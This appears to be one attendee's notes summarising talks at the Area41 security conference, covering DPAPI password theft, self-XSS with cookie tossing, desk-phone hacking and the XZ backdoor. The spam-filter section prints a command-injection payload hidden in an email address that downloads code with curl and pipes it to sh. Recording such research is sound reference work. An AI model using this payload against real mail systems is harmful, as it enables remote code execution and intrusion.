Area41

Why writing these notes? They are an easy way to find references in some years time, for instance if I will recall a presentation, will I remember:

• which conference was it?
• which speaker?
• where are the slides?

Note. At the time of writing slides are not published but most talks will be available at https://www.youtube.com/@defconswitzerland/

Keynote

Speaker. Paula Januszkiewicz @PaulaCqure

Keynote with technical demos, showing two nice tricks: given local admin access to a workstation, if another user is logged into the machine, it is possible to start a service as that user. Second trick: NTDS.DIT contains the certificate to encrypt DPAPI keys, including passwords stored in Chrome. Note that after a compromise, it is not possible to change that certificate (unless multiple hacks are used involving losing customer support).

The tools do decrypt Chrome passwords can be looked up as CQTools, CQURE, DPAPI.

Switching 400'000 Volts with a TCP packet

Speaker. Cyrill Brunschwiler @cybrz

Talk on the swiss electrical grid and substations. Given my complete lack of knowledge in the field of electricity I did not understand a thing but I found it interesting to be exposed to infrastructure completely unknown to me. In addition, one of the take-aways was that cyber attacks can cause black outs lasting from hours to a day but, in case of war, the real threat are missiles.

Armored Witness - Building a Trusted Notary for Bare Metal

Speaker. Andrea Barisani - @AndreaBarisani

Presentation of the https://transparency.dev/ project, based on the TamaGo and GoTEE frameworks. Best to check out the project website rather than summarizing it here.

Self-XSS with Cookie Tossing

Speaker. Thomas Houhou @Th0h0

The talk explores how can self-XSS be abused in combination with cookie tossing. The idea is as follows:

• self-xss in parent-domain.com on e.g. /profile
• attacker has control of subdomain: either XSS or ownership (e.g. attacker-blog.parent-domain.com)
• the attacker sends the victim a link to the controlled subdomain
• from the controlled subdomain the attacker sets a cookie for the path parent-domain.com/profile (where the self XSS is present on the parent domain)
• on that path the victim is logged as the attacker
• the self-xss executes, it is now possible to perform actions, e.g. /get-contacts in the session of the victim (the pre-requisite is that the vicitm is already logged-in on parent-domain.com)

Hacking Desktop Phones

Speaker. Michael Oelke

The talk presents multiple ways to compromise desktop phones provided physical access

Main take-away from my perspective: these phones offer a full linux box where it is easy to priv-esc. If the phones are not deployed in a dedicated and restricted V-LAN, they offer an interesting place for persistence given that no EDR is running on them.

Blogpost: https://www.pentagrid.ch/en/blog/rce-and-local-root-in-openstage-and-openscape-phones/.

Shells at Midnight: Turning a Spam Filter Against Itself

Speaker. Michael Imfeld @born0nmonday@chaos.social

The talks covers a command injection vulnerability in the ClearMail spam filter, where the email addressed is used in a perl script running in a cron job. Within the email RFC it is possible to satisfy the constraints and get a curl | sh into the email address.

TL;DR;

john.doe+|||a=`df|tac`&&curl${a##*d}.modzero.com|cat|sh||@gmail.com

Blogpost: https://modzero.com/en/blog/beyond_the_at_symbol/

Phishing for Primary Refresh Tokens in Microsoft Entra

Speaker. Dirk-jan Mollema @_dirkjan

The talk explores how the provisioning of MFA methods provided by Microsoft Entra is done from scenarios where strong authentication cannot be enforced, e.g. during the device setup.

Technical Deep Dive into the XZ backdoor

Speaker. Timo Schmid @bluec0re

A technical deep dive into the XZ backdoor (not covering evaluations on timeline, attribution etc.)

Slides: https://docs.google.com/presentation/d/1svZTSUcUDxRfTaMfaFmozBNFUvIvWa_1ApUY5yB4BAc/edit?usp=drivesdk

Red Cell - Mimicking Threat Actors for Realistic Responses

Speaker. Thomas Chopitea @tomchop_

The talks covers the difference between a red cell excercise and red teams. It also provides tips on how to balance well being of employees with keeping the threat real (e.g. do you inform the blue team that they are dealing with an excercise, and if so, after how many days? Do you pause the excercise in the weekend? Both on the defense and on the offense?)